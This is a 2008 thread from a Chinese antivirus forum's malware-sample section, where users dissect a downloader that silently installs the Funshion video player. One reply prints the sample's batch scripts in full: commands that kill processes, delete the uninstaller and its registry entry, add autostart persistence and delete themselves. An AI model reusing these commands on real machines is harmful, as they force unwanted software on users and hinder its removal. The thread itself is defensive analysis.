楼主: 九尾野狐
收起左侧

[病毒样本] 下载者 谁去抓一下吧

[复制链接]
九尾野狐
头像被屏蔽
 楼主| 发表于 2008-10-12 16:45:18 | 显示全部楼层
前天的样本了 不用扫了

我是让你们把图里下载地址里的东西抓出来
雨宫优子
发表于 2008-10-12 16:46:24 | 显示全部楼层
我输入Virus不行啊..

看来我是习惯输入大写字母了..
08红伞威点
发表于 2008-10-12 16:47:38 | 显示全部楼层
原帖由 没注册 于 2008-10-12 16:41 发表
默认的virus密码你们这些经常在样本区混的都不知道?

谢谢!习惯了不设蜜,抱歉!

解压红伞监控杀。
雨宫优子
发表于 2008-10-12 16:59:52 | 显示全部楼层
抓到一个..

不知道怎么的刚才没抓到



还有一个风行网络电影的安装包,太大了,不放上来了..

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
醉一生爱妍
发表于 2008-10-12 17:04:31 | 显示全部楼层
dfDelmlljy.bat 作用貌似是测网络是否联通

:try
del "C:\Documents and Settings\Administrator\Local Settings\Temp\456456.exe"
ping 127.0.0.1 >nul
if exist "C:\Documents and Settings\Administrator\Local Settings\Temp\456456.exe" goto try
del %0


0.bat的内容 。。
@echo off
ping -n 3 127.1>nul
taskkill /f /im FunshionInstall_C7661.exe
taskkill /f /im Funshion.exe
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Funshion" /f
"C:\Documents and Settings\Administrator\Local Settings\Temp\FunshionInstall_C7661.exe" /S
ping -n 2 127.1>nul
del /q /f "%userprofile%\桌面\风行网络电影.lnk"
del /q /f "%ALLUSERSPROFILE%\桌面\风行网络电影.lnk"
del /q /f "%ALLUSERSPROFILE%\「开始」菜单\程序\风行\卸载 风行网络电影.lnk"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Funshion /t reg_sz /d  "%ProgramFiles%\Funshion Online\Funshion\Funshion.exe /tray" /f
ping -n 1 127.1>nul
taskkill /f /im SysOptimize.exe
del /q /f "%ProgramFiles%\Funshion Online\Funshion\Uninstall.exe"
ping -n 3 127.1>nul
start "" "%ProgramFiles%\Funshion Online\Funshion\Funshion.exe" /tray
ping -n 10 127.1>nul
del /q /f "C:\Documents and Settings\Administrator\Local Settings\Temp\FunshionInstall_C7661.exe"
DEL "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\0.bat"
CLS
EXIT



怪了 我这里也没下载
醉一生爱妍
发表于 2008-10-12 17:05:09 | 显示全部楼层

回复 14楼 aarwwefdds 的帖子

估计下的就是那个风行吧
雨宫优子
发表于 2008-10-12 17:12:28 | 显示全部楼层
456456里的东西好像和楼主的差不多..

估计就是只是下了风行...

风行怎么那么流氓啊?还是有人想栽赃?
liu5678
发表于 2008-10-12 17:12:54 | 显示全部楼层
我汗。。。~~~刚刚解压出来就被NIS2009干掉了~~直接成了空白~~~
雨宫优子
发表于 2008-10-12 17:14:13 | 显示全部楼层
对了,那个行为分析似乎还有点问题

我这里看到似乎还释放了Beep.sys..

另外我有点不清楚的是,他怎么还会释放一个CMD程序tmpzydf0.exe...

还是有微软签名的..

[ 本帖最后由 aarwwefdds 于 2008-10-12 17:18 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-4 00:25 , Processed in 0.097929 second(s), 14 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表